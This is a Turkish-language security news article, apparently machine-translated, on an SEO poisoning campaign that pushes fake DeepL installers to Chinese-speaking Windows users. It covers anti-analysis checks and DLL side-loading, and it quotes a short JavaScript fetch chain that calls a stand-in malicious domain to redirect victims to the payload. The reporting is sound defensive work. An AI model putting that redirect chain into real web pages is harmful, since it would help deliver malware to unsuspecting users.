Ağustos 2025’te güvenlik araştırmacıları, Çince konuşan Windows kullanıcılarını hedefleyen sofistike bir SEO zehirlenme kampanyası ortaya çıkardı.
Saldırganlar, arama sonucu sıralamalarını özel SEO eklentileri ile manipüle ederek, kötü amaçlı yazılım indirme sitelerini meşru sağlayıcılar olarak başarılı bir şekilde maskelendirdi.
Deepl gibi popüler uygulamaları arayan kurbanlar, minimal karakter ikameleri ve ikna edici dil taşıyan sahte sayfalara yönlendirildi ve orijinal yazılım yerine silahlı kurulumcuları indirmelerini istedi.
Bu teknik, tehdit aktörlerinin sahte alanların ötesinde doğrudan kimlik avı e -postaları veya sosyal mühendislik gerektirmeden geniş bir kitleye ulaşmalarına izin verdi.
Fortinet analistleri, her biri meşru uygulama ikili ve kötü amaçlı yüklerin bir kombinasyonunu dağıtmak için tasarlanmış, arama motorlarında yüksek sırada yer alan birden fazla hileli alan belirledi.
Böyle bir siteyi ziyaret ettikten sonra, JavaScript tabanlı bir yükleyici Nice.js Son yükleyici URL’sini belirlemek için JSON yanıtlarını dinamik olarak alan çok aşamalı bir indirme işlemi düzenler.
.webp)
Kurulum akışına bu sorunsuz kötü amaçlı yazılım enjeksiyonu, sıradan kullanıcıların tespitini neredeyse imkansız hale getirir.
Bu silahlı kurulumcular tarafından toplanan çalıntı kimlik bilgileri ve sistem verileri daha sonra yeraltı pazarlarında daha fazla uzlaşma, yanal hareket veya satış için kaldırılabilir.
Bu kampanyanın etkisi, basit kimlik hırsızlığının ötesine uzanıyor. Yürütüldükten sonra, MSI yükleyicisi kendini yönetici ayrıcalıklarına yükseltir ve hata ayıklamalı bir DLL, parçalanmış fermuar arşivleri ve yardımcı dosyalar da dahil olmak üzere çeşitli bileşenleri bırakır.
Birincil DLL içindeki bir anti-analiz rutini, sanal havuzlama ve sanallaştırma ortamlarından kaçınmak için ana işlem kontrolleri, HTTP tarih sorguları yoluyla uyku bütünlüğü doğrulaması ve ACPI tablo denetimleri yapar.
Sadece bu kontrollerden sonra kötü amaçlı yazılım yükünü yeniden yapılandırır ve açar ve gerçek son kullanıcı makinelerinde sağlam dağıtım sağlar.
Enfeksiyon mekanizması
Enfeksiyon mekanizmasının çekirdeği, Nice.js Sahtekarlık alanlarının içine gömülü komut dosyası.
Sayfa yükü üzerine, komut dosyası bir istek sırası aşağıdaki gibi yürütür:-
fetch(`https://spoofeddomain.com/api/download?device=${deviceType}&domain=${currentDomain}`)
.then(response => response.json())
.then(data => fetch(data.secondaryLink))
.then(response => response.json())
.then(data => window.location.href = data.finalUrl);Bu JSON tabanlı yönlendirme zinciri sadece kötü niyetli içerik sunumunu gizlemekle kalmaz, aynı zamanda tehdit aktörünün yükleri kurbanın cihaz türüne ve etki alanı kökenine göre uyarlamasına da izin verir.
.webp)
Kullanıcı son URL’ye yönlendirildikten sonra, MSI paketi meşru bir DeepL yükleyicisini kötü niyetle harmanlar Enumw.dllsaldırganın sistemindeki bir hata ayıklama yoluna atıfta bulunulur.
. Enumw.dll Dosya, Windows yükleyicisi içinde özel bir eylemi tetikler. ooo89 Yükle ekstraksiyondan önce anti-analiz kontrollerini başlatan fonksiyon.
Parçalanmış zip arşivleri (temp_data_1 başından sonuna kadar temp_data_55) bir emoji.dat Dosya, Decompressed ve adlı benzersiz bir dizinin altında dağıtıldı plsamc{systemUptime} Kullanıcı profilinde.
Paketlenmiş bir sonraki yan yükleme vstdlib.dll Kardeş exe dosyaları arayarak kalıcılığı sağlar ve adli analizi karmaşıklaştırır.
.webp)
Saldırı, ilk arama sonucundan nihai yük uygulamasına akar ve bu SEO zehirlenme işleminin gizliliğini ve sofistike olmasını vurgular.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.